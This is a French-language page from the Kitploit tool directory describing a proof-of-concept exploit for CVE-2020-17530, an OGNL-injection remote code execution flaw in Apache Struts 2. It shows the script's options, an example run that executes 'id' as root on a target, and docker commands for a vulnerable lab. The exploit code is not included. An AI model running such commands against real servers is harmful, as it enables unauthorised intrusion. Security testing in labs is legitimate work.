Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-17530 — Preuve de concept d'exploit pour CVE-2020-17530, une vulnérabilité d'exécution de code à distance dans Apache Struts 2 via une injection OGNL. Inclut un script Python pour cibler les instances Struts vulnérables. | Kitploit
Outils/GitHubGitHub/cyborgsecurity/cve-2020-17530
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingArchived
GitHubcyborgsecurity/cve-2020-17530

CVE-2020-17530

Preuve de concept d'exploit pour CVE-2020-17530, une vulnérabilité d'exécution de code à distance dans Apache Struts 2 via une injection OGNL. Inclut un script Python pour cibler les instances Struts vulnérables.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
43il y a 5 ansPas encore vérifié

CVE-2020-17530

POC rapide pour CVE-2020-17530. Dans les versions Apache Struts 2.0.0 - 2.5.25, une évaluation forcée du langage de navigation de graphes d'objets (OGNL) sur les entrées utilisateur brutes dans les attributs de balise peut conduire à une exécution de code à distance (RCE).

root@kitploit:~
$ python CVE-2020-17530.py --help
usage: CVE-2020-17530.py [-h] [-c COMMAND] [-n NAME] [-p PORT] [-t TARGET] [-u URI]

optional arguments:
  -h, --help            show this help message and exit
  -c COMMAND, --command COMMAND
                        command
  -n NAME, --name NAME  form data name
  -p PORT, --port PORT  port
  -t TARGET, --target TARGET
                        target
  -u URI, --uri URI     uri

$ python CVE-2020-17530.py --target 10.10.30.62 --port 8080 --uri "/index.action" --command id
uid=0(root) gid=0(root) groups=0(root)

Installation

root@kitploit:~
$ docker pull vulhub/struts2:2.5.25
$ docker run -d -p 8080:8080 vulhub/struts2:2.5.25
Télécharger l’outil